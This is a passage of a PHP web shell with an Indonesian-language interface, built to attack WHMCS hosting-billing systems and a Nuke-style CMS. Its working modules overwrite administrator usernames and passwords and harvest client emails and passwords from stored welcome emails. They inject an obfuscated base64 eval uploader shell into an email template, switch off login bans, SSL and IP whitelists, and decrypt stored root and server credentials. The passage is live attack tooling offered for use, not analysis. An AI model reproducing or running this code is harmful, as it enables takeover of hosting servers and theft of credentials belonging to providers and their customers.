  4101. $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
  4102. $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
  4103. $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
  4104.  
  4105. $oke=@mysql_query($okenuke1);
  4106. $oke=@mysql_query($okenuke2);
  4107. $oke=@mysql_query($okenuke3);
  4108. $oke=@mysql_query($okenuke4);
  4109. if($oke)
  4110. {
  4111. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  4112. }
  4113. }
  4114.  
  4115. # x=dmwhmcs9
  4116. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs9')) {
  4117. ?>
  4118. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs9" method="post">
  4119.  
  4120. <p><br/><body>
  4121. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
  4122. <p><form method="post">
  4123. <table border=1>
  4124. <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
  4125. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
  4126. <br></form></center>
  4127.  
  4128. <?php
  4129. @error_reporting(0);
  4130. @ini_set('log_errors',0);
  4131. @ini_set('error_log',NULL);
  4132. if(isset($_POST['plapon'])){
  4133. $target = $_POST['url'];
  4134. $bukadikitjoss = fopen("$target/?licensedebug","r");
  4135. $hasil = '';
  4136. while (!feof($bukadikitjoss)) {
  4137. $hasil .= fread($bukadikitjoss, 8192);
  4138. }
  4139. echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
  4140. }
  4141. echo "</table>";
  4142. }
  4143.  
  4144. # x=dmwhmcs1
  4145. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs1')) {
  4146. ?>
  4147. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs1" method="post">
  4148.  
  4149. <p><br/><body>
  4150. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
  4151. <p><form method="post">
  4152. <table border=1>
  4153. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  4154. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  4155. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  4156. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  4157. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  4158.  
  4159. </table>
  4160. <br></form></center>
  4161.  
  4162. <?php
  4163. if(isset($_POST['plapon'])) {
  4164.  
  4165. $perawan = $_POST['anu1'];
  4166. $kimcil = $_POST['anu2'];
  4167. $janda = $_POST['anu3'];
  4168. $hotel = $_POST['anu4'];
  4169. function get_string_between($string, $start, $end){
  4170. $string = " ".$string;
  4171. $ini = strpos($string,$start);
  4172. if ($ini == 0) return "";
  4173. $ini += strlen($start);
  4174. $len = strpos($string,$end,$ini) - $ini;
  4175. return substr($string,$ini,$len);
  4176. }
  4177. @mysql_connect($perawan,$kimcil,$janda);
  4178. @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
  4179. $query="select subject,message from tblemails";
  4180. $result=mysql_query($query);
  4181. mysql_close();
  4182. $num=mysql_numrows($result);
  4183. $i=0;
  4184. while ($i < $num) {
  4185. $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4186. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
  4187. <th align='center'><b>CLIENT EMAIL</b></th>
  4188. <th align='center'><b>CLIENT PASSWORD</b></th>
  4189. </tr>";
  4190.  
  4191.  
  4192. if(stristr($css,"Welcome")){
  4193. $s =mysql_result($result,$i,"message");
  4194. if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
  4195. $mail= get_string_between($s,"Login Username: ","<br />");
  4196. $m2 = get_string_between($s,"Email Address: ","<br />");
  4197. $pass = get_string_between($s,"Password: ","</p>");
  4198. print $mail.$m2.":".$pass."<br>";
  4199.  
  4200. echo "<tr>
  4201. <td align='center'>$mail.$m2.</td>
  4202. <td align='center'>".$pass."</td>
  4203. </tr>";
  4204. }
  4205. }
  4206. ++$i;
  4207. }
  4208. }
  4209. echo "</table>";
  4210. }
  4211.  
  4212. # x=dmwhmcs3
  4213. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs3')) {
  4214. ?>
  4215. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs3" method="post">
  4216. <p><br/><body>
  4217. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
  4218. <p><form method="post">
  4219. <table border=1>
  4220. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  4221. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  4222. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  4223. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  4224. <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
  4225. <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="hacker" name="userbaru"></td></tr>
  4226. <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="hackerpassword" name="passbaru"></td></tr>
  4227.  
  4228. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  4229. </table>
  4230. <br>
  4231. </form>
  4232. </center>
  4233.  
  4234. <?php
  4235. if(isset($_POST['plapon'])) {
  4236. $anu1 = $_POST['anu1'];
  4237. $anu2 = $_POST['anu2'];
  4238. $anu3 = $_POST['anu3'];
  4239. $anu4 = $_POST['anu4'];
  4240. @mysql_connect($anu1,$anu2,$anu3);
  4241. @mysql_select_db($anu4);
  4242.  
  4243. $idmaho=str_replace("\'","'",$idmaho);
  4244. $target_id = $_POST['idmaho'];
  4245. $userbaru=str_replace("\'","'",$userbaru);
  4246. $ganti_user = $_POST['userbaru'];
  4247. $passbaru=str_replace("\'","'",$passbaru);
  4248.  
  4249. $hash_pass = $_POST['passbaru'];
  4250. $ganti_pass = md5($hash_pass);
  4251.  
  4252. $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  4253. $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  4254.  
  4255. $udah_ganteng=@mysql_query($colox);
  4256. $udah_ganteng=@mysql_query($coloxx);
  4257. if($udah_ganteng)
  4258. {
  4259. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  4260. }
  4261. }
  4262.  
  4263. }
  4264.  
  4265.  
  4266. # x=dmwhmcs2
  4267. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs2')) {
  4268. ?>
  4269. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs2" method="post">
  4270. <p><br/><body>
  4271. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
  4272. <p><form method="post">
  4273. <table border=1>
  4274. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  4275. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  4276. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  4277. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  4278. <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
  4279. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
  4280. </td></tr>
  4281. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  4282. </table>
  4283. <br>
  4284. </form>
  4285. </center>
  4286. <?php
  4287. if(isset($_POST['plapon'])) {
  4288. $anu1 = $_POST['anu1'];
  4289. $anu2 = $_POST['anu2'];
  4290. $anu3 = $_POST['anu3'];
  4291. $anu4 = $_POST['anu4'];
  4292. @mysql_connect($anu1,$anu2,$anu3);
  4293. @mysql_select_db($anu4);
  4294. $shell=str_replace("'","'",$shell);
  4295. $gosok_shell = $_POST['shell'];
  4296. $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
  4297. $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
  4298. {
  4299. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  4300. }
  4301. }
  4302. }
  4303.  
  4304.  
  4305. # x=dmwhmcs4
  4306. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwhmcs4')) {
  4307. ?>
  4308. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs4" method="post">
  4309. <p><br/><body>
  4310. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
  4311. <p><form method="post">
  4312. <table border=1>
  4313. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  4314. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  4315. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  4316. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  4317. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  4318. </table>
  4319. <br>
  4320. </FORM>
  4321. </center>
  4322. <?php
  4323. if(isset($_POST['plapon'])) {
  4324.  
  4325. $anu1 = $_POST['anu1'];
  4326. $anu2 = $_POST['anu2'];
  4327. $anu3 = $_POST['anu3'];
  4328. $anu4 = $_POST['anu4'];
  4329. @mysql_connect($anu1,$anu2,$anu3);
  4330. @mysql_select_db($anu4);
  4331.  
  4332. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  4333. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  4334. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  4335. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  4336. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  4337. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  4338. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  4339. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  4340. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  4341.  
  4342. $udah_ganteng=@mysql_query($crot1);
  4343. $udah_ganteng=@mysql_query($crot2);
  4344. $udah_ganteng=@mysql_query($crot3);
  4345. $udah_ganteng=@mysql_query($crot4);
  4346. $udah_ganteng=@mysql_query($crot5);
  4347. $udah_ganteng=@mysql_query($crot6);
  4348. $udah_ganteng=@mysql_query($crot7);
  4349. $udah_ganteng=@mysql_query($crot8);
  4350. $udah_ganteng=@mysql_query($crot9);
  4351. $udah_ganteng=@mysql_query($crot10);
  4352.  
  4353. if($udah_ganteng)
  4354. {
  4355. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  4356. }
  4357. }
  4358. }
  4359.  
  4360.  
  4361. # x=whmcs1
  4362. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs1')) {
  4363. ?>
  4364. <form action="?dm=<?php echo $pwd; ?>&amp;x=whmcs1" method="post">
  4365.  
  4366. <p><br/><body>
  4367. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><nobr><b><span class="b7">O=:[ WHMCS</span> <span class="b8">DECODER ]:=O</span></b></nobr><br/><br/>
  4368. <p><form method="post">
  4369. <table border=1>
  4370. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  4371. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  4372. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  4373. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  4374. <tr><td>cc_encryption_hash</td><td><input style="color:#FF0000;background-color:#000000" type="text" size="60" name="anu5"></td></tr>
  4375. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  4376.  
  4377. </table>
  4378. <br></form></center>
  4379.  
  4380. <?php
  4381. $perawan = $_POST['anu1'];
  4382. $kimcil = $_POST['anu2'];
  4383. $janda = $_POST['anu3'];
  4384. $hotel = $_POST['anu4'];
  4385. $kondom = $_POST['anu5'];
  4386.  
  4387. @mysql_connect($perawan,$kimcil,$janda);
  4388. @mysql_select_db($hotel);
  4389. $cc_encryption_hash = $kondom;
  4390.  
  4391. function dec($string,$cc_encryption_hash){
  4392. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  4393. $hash_key = _hash($key);
  4394.  
  4395. $hash_length = strlen($hash_key);
  4396. $string = base64_decode($string);
  4397. $tmp_iv = substr($string,0,$hash_length);
  4398. $string = substr($string,$hash_length,strlen ($string) - $hash_length);
  4399. $iv = $out = '';
  4400. $c = 0;
  4401. while ($c < $hash_length){
  4402. $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  4403. ++$c;
  4404. }
  4405.  
  4406. $key = $iv;
  4407. $c = 0;
  4408. while ($c < strlen($string)){
  4409. if (($c != 0 AND $c % $hash_length == 0)){
  4410.  
  4411. $key = _hash($key . substr($out,$c - $hash_length,$hash_length));
  4412. }
  4413. $out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
  4414. ++$c;
  4415. }
  4416. return $out;
  4417. }
  4418. function _hash($string)
  4419. {
  4420. $hash = (function_exists('sha1')) ? sha1($string):md5($string);
  4421. $out = '';
  4422. $c = 0;
  4423.  
  4424. while ($c < strlen($hash)){
  4425. $out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
  4426. $c += 2;
  4427. }
  4428. return $out;
  4429. }
  4430.  
  4431. ######## GO TO HELL ########
  4432. ##### :D ########### :D #####
  4433.  
  4434. if(isset($_POST['plapon'])) {
  4435. $query = mysql_query("SELECT *FROM tblservers");
  4436. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4437. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr>
  4438.  
  4439. <tr>
  4440. <th align='center'><b>TYPE</b></th>
  4441. <th align='center'><b>ACTIVE</b></th>
  4442. <th align='center'><b>HOSTNAME</b></th>
  4443. <th align='center'><b>IP ADDRESS</b></th>
  4444. <th align='center'><b>USERNAME</b></th>
  4445. <th align='center'><b>PASSWORD</b></th>
  4446. <th align='center'><b>ACCESS HASH</b></th></tr>";
  4447. if(!is_array(mysql_fetch_array($query))){
  4448. echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
  4449. }
  4450. while($v = mysql_fetch_array($query)) {
  4451. echo "<tr>
  4452. <td align='center'>{$v['type']}</td>
  4453. <td align='center'>{$v['active']}</td>
  4454. <td align='center'>{$v['hostname']}</td>
  4455. <td align='center'>{$v['ipaddress']}</td>
  4456. <td align='center'>{$v['username']}</td>
  4457. <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
  4458. <td align='center'>{$v['accesshash']}</td>
  4459. </tr>";
  4460. }
  4461. echo "</table>";
  4462.  
  4463.  
  4464. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
  4465. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4466. <tr><th colspan='6'><span class='b7'>O=:[ CLIENTS ROOT ]:=O</span> </th></tr>
  4467.  
  4468. <tr>
  4469. <th align='center'><b> DOMAIN</b></th>
  4470. <th align='center'><b> STATUS</b></th>
  4471. <th align='center'><b> USERNAME</b></th>
  4472. <th align='center'><b> PASSWORD</b></th>
  4473. <th align='center'><b> DEDICATED IP</b></th>
  4474. <th align='center'><b> ASSIGNED IP</b></th></tr>";
  4475.  
  4476. if(!is_array(mysql_fetch_array($query))){
  4477. echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
  4478. }
  4479. while($v = mysql_fetch_array($query)){
  4480. echo "<tr>
  4481. <td align='center'> {$v['domain']}</td>
  4482. <td align='center'> {$v['domainstatus']}</td>
  4483. <td align='center'> {$v['username']}</td>
  4484. <td align='center'> ".dec($v['password'],$cc_encryption_hash)."</td>
  4485. <td align='center'> {$v['dedicatedip']}</td>
  4486. <td align='center'> {$v['assignedips']}</td></tr>";
  4487. }
  4488. echo "</table>";
  4489.  
  4490. $query = mysql_query("SELECT *FROM tblregistrars");
